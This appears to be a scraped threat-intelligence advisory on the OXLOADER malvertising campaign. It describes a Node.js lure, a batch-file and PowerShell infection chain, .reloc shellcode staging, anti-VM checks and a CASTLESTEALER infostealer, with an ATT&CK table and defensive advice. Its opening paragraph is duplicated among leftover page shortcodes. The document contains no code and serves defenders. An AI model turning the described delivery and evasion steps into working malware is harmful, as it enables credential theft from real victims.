EXECUTIVE SUMMARY
A financially motivated, Russian‐speaking group is behind the recent OXLOADER campaign. The actors use a malvertising approach, purchasing Google Ads that masquerade as legitimate development tools to lure victims. Campaign activity has been observed primarily against organizations in the United States, with a focus on technology and financial services firms. Their objective is to install the CASTLESTEALER infostealer, enabling ongoing credential harvesting and personal data exfiltration.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
A financially motivated, Russian‐speaking group is behind the recent OXLOADER campaign. The actors use a malvertising approach, purchasing Google Ads that masquerade as legitimate development tools to lure victims. Campaign activity has been observed primarily against organizations in the United States, with a focus on technology and financial services firms. Their objective is to install the CASTLESTEALER infostealer, enabling ongoing credential harvesting and personal data exfiltration.[emaillocker id="1283"]
The operation demonstrates a clear intent to monetize stolen information rather than to cause direct disruption. The infection begins when a user clicks a sponsored search result that redirects to a fake Node.js download page. That page serves a batch file hosted on a public file‐sharing service, which presents a counterfeit installation wizard before invoking PowerShell to retrieve a second-stage executable. The loader then runs with elevated privileges, abuses the Windows .reloc section to stage shellcode, and employs multiple self‐decryption loops to unpack a .NET payload.
Once active, the payload establishes persistence, harvests credential stores, and communicates with remote servers to exfiltrate the collected data. The campaign is notable because its layered obfuscation and environment checks allow it to slip past many conventional antivirus products and sandbox analyses. Anti‐VM tests that require multiple CPUs, several gigabytes of memory, and a non‐CIS geographic profile make automated detection difficult, while the use of legitimate‐looking binaries reduces suspicion. Organizations should tighten web‐gateway filtering, block suspicious ad content, and enforce strict execution policies for PowerShell and batch scripts. Continuous monitoring for abnormal process injection, regular credential‐vault audits, and robust backup routines further reduce the impact of a successful compromise.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Defense Evasion | T1036.005 | Masquerading | Match Legitimate Name or Location |
| Defense Evasion | T1497.001 | Virtualization/Sandbox Evasion | System Checks |
| Defense Evasion | T1574.001 | Hijack Execution Flow | DLL Search Order Hijacking |
| Privilege Escalation | T1055.001 | Process Injection | Dynamic-link Library Injection |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
REFERENCES:
reports contain further technical details:
https://thehackernews.com/2026/06/new-oxloader-loader-uses-malicious.html
https://www.elastic.co/security-labs/oxloader-malware-loader-infostealer